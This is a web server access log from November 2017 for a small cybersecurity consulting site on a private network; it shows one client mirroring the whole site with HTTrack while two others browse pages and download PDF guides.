192.168.0.36 - - [12/Nov/2017:18:35:48 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:49 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:50 -0500] "GET /fade.gif HTTP/1.1" 200 1112 "http://192.168.0.35/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:51 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:52 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81377 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:53 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:54 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42819 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:55 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47030 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:35:58 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7836 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:01 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /products.html HTTP/1.1" 200 7158 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26428 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38062 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:36:01 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.36 - - [12/Nov/2017:18:36:02 -0500] "GET /products.html HTTP/1.1" 200 7158 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:03 -0500] "GET /consulting.html HTTP/1.1" 200 7268 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:04 -0500] "GET /resources.html HTTP/1.1" 200 7568 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:05 -0500] "GET /about.html HTTP/1.1" 200 7041 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:06 -0500] "GET /support.html HTTP/1.1" 200 6207 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:07 -0500] "GET /contact.html HTTP/1.1" 200 6975 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.37 - - [12/Nov/2017:18:36:08 -0500] "GET /about.html HTTP/1.1" 200 7042 "http://192.168.0.35/incident.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.36 - - [12/Nov/2017:18:36:08 -0500] "GET /request-quote.html HTTP/1.1" 200 7325 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.37 - - [12/Nov/2017:18:36:08 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:36:08 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:36:08 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:36:08 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:36:08 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1" 200 5011 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.36 - - [12/Nov/2017:18:36:09 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:10 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:11 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/index.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:12 -0500] "GET /files/theme/images/default-bgaf0e.jpg?1509483497 HTTP/1.1" 200 239379 "http://192.168.0.35/files/main_styleaf0e.css?1509483497" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:13 -0500] "GET /files/theme/images/select-arrowaf0e.png?1509483497 HTTP/1.1" 200 1385 "http://192.168.0.35/files/main_styleaf0e.css?1509483497" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:14 -0500] "GET /files/theme/images/light-checkboxaf0e.png?1509483497 HTTP/1.1" 200 1456 "http://192.168.0.35/files/main_styleaf0e.css?1509483497" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:15 -0500] "GET /files/theme/images/icon-bubbleaf0e.png?1509483497 HTTP/1.1" 200 1584 "http://192.168.0.35/files/main_styleaf0e.css?1509483497" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:16 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:17 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26427 "http://192.168.0.35/products.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:18 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38062 "http://192.168.0.35/products.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:19 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/products.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:20 -0500] "GET /risk.html HTTP/1.1" 200 6605 "http://192.168.0.35/products.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:21 -0500] "GET /incident.html HTTP/1.1" 200 6620 "http://192.168.0.35/products.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:23 -0500] "GET /bcp.html HTTP/1.1" 200 6650 "http://192.168.0.35/products.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:25 -0500] "GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1" 200 120189 "http://192.168.0.35/consulting.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:27 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5011 "http://192.168.0.35/consulting.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:29 -0500] "GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1" 200 47805 "http://192.168.0.35/resources.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:31 -0500] "GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1" 200 7768 "http://192.168.0.35/resources.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:35 -0500] "GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1" 200 20173 "http://192.168.0.35/resources.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:40 -0500] "GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1" 200 43725 "http://192.168.0.35/resources.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:41 -0500] "GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1" 200 45954 "http://192.168.0.35/resources.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:47 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5012 "http://192.168.0.35/resources.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:53 -0500] "GET /uploads/2/9/1/4/29147191/principles_of_encryption.pdf HTTP/1.1" 200 1045140 "http://192.168.0.35/resources.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:55 -0500] "GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1" 200 265419 "http://192.168.0.35/about.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.37 - - [12/Nov/2017:18:37:23 -0500] "GET /consulting.html HTTP/1.1" 200 7269 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:37:23 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:37:23 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:37:23 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:37:23 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:37:24 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5011 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] "GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1" 200 47804 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] "GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1" 200 7769 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] "GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1" 200 20174 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] "GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1" 200 43725 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] "GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1" 200 45954 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:37:27 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:37:30 -0500] "GET /uploads/2/9/1/4/29147191/principles_of_cyber.pdf HTTP/1.1" 200 765194 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.36 - - [12/Nov/2017:18:36:49 -0500] "GET /uploads/2/9/1/4/29147191/protecting_your_identity.pdf HTTP/1.1" 200 775341 "http://192.168.0.35/resources.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:36:51 -0500] "GET /uploads/2/9/1/4/29147191/principles_of_cyber.pdf HTTP/1.1" 200 765194 "http://192.168.0.35/resources.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:37:44 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1" 200 5012 "http://192.168.0.35/about.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:37:45 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/iPad.html HTTP/1.1" 200 5011 "http://192.168.0.35/contact.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.11 - - [12/Nov/2017:18:37:46 -0500] "GET /risk.html HTTP/1.1" 200 6606 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:37:46 -0500] "GET /uploads/2/9/1/4/29147191/43527096c52.png?356 HTTP/1.1" 200 55344 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:37:46 -0500] "GET /uploads/2/9/1/4/29147191/4418930_orig.png HTTP/1.1" 200 174914 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.11 - - [12/Nov/2017:18:37:46 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Graph.html HTTP/1.1" 200 5011 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
192.168.0.36 - - [12/Nov/2017:18:37:47 -0500] "GET /uploads/2/9/1/4/29147191/43527096c52.png?356 HTTP/1.1" 200 55344 "http://192.168.0.35/risk.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:38:00 -0500] "GET /uploads/2/9/1/4/29147191/4418930_orig.png HTTP/1.1" 200 174914 "http://192.168.0.35/risk.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:38:31 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Graph.html HTTP/1.1" 200 5012 "http://192.168.0.35/risk.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:38:32 -0500] "GET /uploads/2/9/1/4/29147191/4174185_orig.png HTTP/1.1" 200 99001 "http://192.168.0.35/incident.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:38:49 -0500] "GET /uploads/2/9/1/4/29147191/1888827_orig.png HTTP/1.1" 200 59026 "http://192.168.0.35/incident.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:39:01 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working.html HTTP/1.1" 200 5012 "http://192.168.0.35/incident.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:39:03 -0500] "GET /uploads/2/9/1/4/29147191/601239_orig.png HTTP/1.1" 200 111182 "http://192.168.0.35/bcp.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:39:05 -0500] "GET /uploads/2/9/1/4/29147191/4304070_orig.png HTTP/1.1" 200 57268 "http://192.168.0.35/bcp.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.36 - - [12/Nov/2017:18:39:07 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Coffee.html HTTP/1.1" 200 5012 "http://192.168.0.35/bcp.html" "Mozilla/4.5 (compatible; HTTrack 3.0x; Windows 98)"
192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] "GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1" 200 47804 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] "GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1" 200 7769 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] "GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1" 200 20174 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] "GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1" 200 43724 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] "GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1" 200 45953 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:41:56 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:18:42:01 -0500] "GET /uploads/2/9/1/4/29147191/protecting_your_identity.pdf HTTP/1.1" 200 775340 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] "GET /products.html HTTP/1.1" 200 7158 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 304 182 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 304 182 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 304 182 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:10 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] "GET /risk.html HTTP/1.1" 200 6605 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] "GET /uploads/2/9/1/4/29147191/43527096c52.png?356 HTTP/1.1" 200 55344 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:14 -0500] "GET /uploads/2/9/1/4/29147191/4418930_orig.png HTTP/1.1" 200 174913 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:15 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Graph.html HTTP/1.1" 200 5011 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] "GET /contact.html HTTP/1.1" 200 6975 "http://192.168.0.35/risk.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/contact.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/contact.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0"
